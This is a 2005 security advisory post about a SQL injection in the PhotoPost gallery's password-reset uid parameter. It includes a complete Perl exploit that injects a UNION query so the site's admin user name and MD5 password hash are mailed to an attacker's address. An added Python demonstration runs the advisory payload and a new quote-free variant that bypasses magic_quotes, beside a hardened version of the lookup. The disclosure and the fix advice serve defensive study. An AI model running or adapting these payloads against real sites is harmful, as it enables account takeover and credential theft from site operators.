PhotoPost Arbitrary Data Exploit
Category: Vulnerability Posted: 2005-04-04 by basher13 Views: 701
Update:
23:40 04/04/05
Subject:
" PhotoPost Arbitrary Data Exploit "
Description:
PhotoPost is popular commercial image publishing software. The vendor describes it as follows:
Everyone loves showing off their photos! Add PhotoPost to your site,
or let us install it for you, and your visitors will be able to upload
their photos to galleries on your site and interact in photo
discussions. Join the 3,500+ sites that are already using
PhotoPost and add a fun new dimension to your website.
Vulnerability:
PhotoPost (further on - PP) is built on a highly risky principle
of filtering input data: it relies on PHP's magic_quotes. The PHP manual describes the setting as:
magic_quotes_gpc boolean
Sets the magic_quotes state for GPC (Get/Post/Cookie) operations.
When magic_quotes are on, all ' (single-quote), " (double quote), \ (backslash)
and NUL's are escaped with a backslash automatically.
A large percentage of PP users neglect to turn magic_quotes on.
It is a bad idea to leave the essential matter of data filtering to the
site administrator's configuration; the application itself should escape every
value it pastes into a query with mysql_escape_string/mysql_real_escape_string.
Adding a few lines of native code would have removed that "human" factor entirely.
Many users have no idea what magic_quotes is, what it is for, or what their
negligence will lead to, even despite the warning PP gives during installation.
Given the architecture PP is built on, PP should not even attempt to install
itself on systems with magic_quotes turned off.
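What the dependence on magic_quotes does and does not buy, as an added example that is not part of the original post or of PhotoPost's code. It reconstructs the password-reset lookup in Python over an in-memory SQLite table: the `users` table layout, the column names and the shape of the query are assumptions (the advisory only shows the injected URL), the account data is constructed, and CONCAT() is written as `||` for SQLite. It goes beyond the advisory in one respect: alongside the advisory's payload it runs a second one that contains no quote characters, to show that escaping quotes cannot protect a parameter that is spliced into the SQL unquoted, and it sets the vulnerable lookup beside a hardened one.

```python
import sqlite3

# Added example, not PhotoPost's own code. Table layout and query shape are
# assumptions; the advisory shows only the injected URL.

ATTACKER_MAIL = "attacker@example.com"  # stands in for the [mail] argument

# The advisory's payload, translated for SQLite (CONCAT() becomes ||).
ADVISORY_PAYLOAD = (
    "0 UNION SELECT '0', '" + ATTACKER_MAIL + "', "
    "username || ' ' || password FROM users"
)

# A variant without any quote character, so magic_quotes_gpc has nothing to
# escape (on MySQL the mail address could likewise be supplied as a 0x.. hex
# literal instead of a quoted string).
QUOTELESS_PAYLOAD = "0 UNION SELECT uid, username, password FROM users"


def build_db():
    """Constructed sample data: two accounts with MD5 password hashes."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (uid INTEGER, username TEXT, password TEXT, email TEXT)"
    )
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?)",
        [
            (1, "admin", "21232f297a57a5a743894a0e4a801fc3", "admin@example.com"),
            (2, "alice", "5f4dcc3b5aa765d61d8327deb882cf99", "alice@example.com"),
        ],
    )
    return con


def magic_quotes_gpc(value):
    """Emulate PHP's magic_quotes_gpc: backslash-escape ', ", \\ and NUL."""
    out = []
    for ch in value:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def reset_lookup_vulnerable(con, uid, magic_quotes=False):
    """Assumed shape of the vulnerable lookup: uid is pasted into the SQL
    unquoted, i.e. in a numeric context. Returns the rows the reset code would
    act on, or None when the database rejects the statement."""
    if magic_quotes:
        uid = magic_quotes_gpc(uid)
    sql = (
        "SELECT uid, email, username || ' ' || password FROM users WHERE uid = "
        + uid
    )
    try:
        return con.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def reset_lookup_safe(con, uid):
    """Hardened form: reject anything that is not an integer, then bind it as
    a parameter so no user data is ever spliced into the SQL text."""
    try:
        uid_int = int(uid)
    except ValueError:
        return []
    return con.execute(
        "SELECT uid, email, username || ' ' || password FROM users WHERE uid = ?",
        (uid_int,),
    ).fetchall()


if __name__ == "__main__":
    con = build_db()
    for name, payload in (("advisory", ADVISORY_PAYLOAD), ("quoteless", QUOTELESS_PAYLOAD)):
        for mq in (False, True):
            label = "magic_quotes on " if mq else "magic_quotes off"
            print(name, label, reset_lookup_vulnerable(con, payload, mq))
    print("safe:", reset_lookup_safe(con, ADVISORY_PAYLOAD), reset_lookup_safe(con, "1"))
```

With magic_quotes off, the advisory's payload makes the lookup return every account's user name and hash with the attacker's address in the e-mail column, which is exactly what the reset code then mails out. With magic_quotes on, the escaped quotes make the statement a syntax error, so that payload fails; the quote-free variant still returns every hash, because the escaping never touches it. The hardened lookup returns nothing for either payload and only the requested row for a genuine uid.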
Exploit:
#!/usr/bin/perl
# PhotoPost Arbitrary Data Exploit
# --------------------------------
#
# Greets: Igor Franchuk (discovered the bug)
# Usage:
#   phpost.pl [target_host] [path] [mail] [port]
# Example:
#   phpost.pl www.target.com photopost jhon@doe.com 80
#
# Run the exploit first; the admin user name and MD5 hash are then mailed
# to the address you supplied.
# Info: 98.to/infamous
use strict;
use warnings;
use IO::Socket;

my $banner = "PhotoPost Arbitrary data exploit\n\n";
print "$banner\n";
print "\n-------------------------------\n";
print "\nINFGP-Hacking&Security Research\n";
print "\n\n";

usage() unless @ARGV == 4;

my ( $host, $path, $mail, $port ) = @ARGV;

# The injected uid parameter: the password-reset query is extended with a
# UNION that selects the attacker's mail address as the reset recipient and
# "username password" (the MD5 hash) as the data to send.
my $payload = 'member.php?ppaction=rpwd&verifykey=0&uid=0%20union%20select%20"0","'
            . $mail
            . '",%20concat(username,"%20",%20password)%20from%20users';

my $inet = IO::Socket::INET->new( PeerAddr => $host, PeerPort => $port, Proto => "tcp" )
    or die "[-] Cannot connect to $host:$port\n";
print "[+] Connected to host...\n";
# HTTP/1.0 with a Host header so name-based virtual hosts route the request.
print $inet "GET /$path/$payload HTTP/1.0\r\nHost: $host\r\n\r\n";
print "[+] Sent payload...\n";
# Read the reply so the server finishes handling the request.
my @reply = <$inet>;
close($inet);
print "[+] Target exploited: " . ( defined $reply[0] ? $reply[0] : "(no response)\n" );
print "[+] You should check $mail now\n";

sub usage {
    die("\n\nUsage: perl $0 [target] [path] [mail] [port]\n\n");
}
Solution:
The vendor was contacted. Upgrade to the latest version.
As a stop-gap, force magic_quotes on for the PhotoPost directory with a .htaccess entry:
php_value magic_quotes_gpc 1
Note that this only breaks payloads that contain quote characters. The injected uid
parameter is used in a numeric context (the payload begins with 0 union select and
never closes a quote), so the real fix is for the application to cast uid to an
integer and to escape string values with mysql_real_escape_string itself.
Vendor URL:
http://www.photopost.com/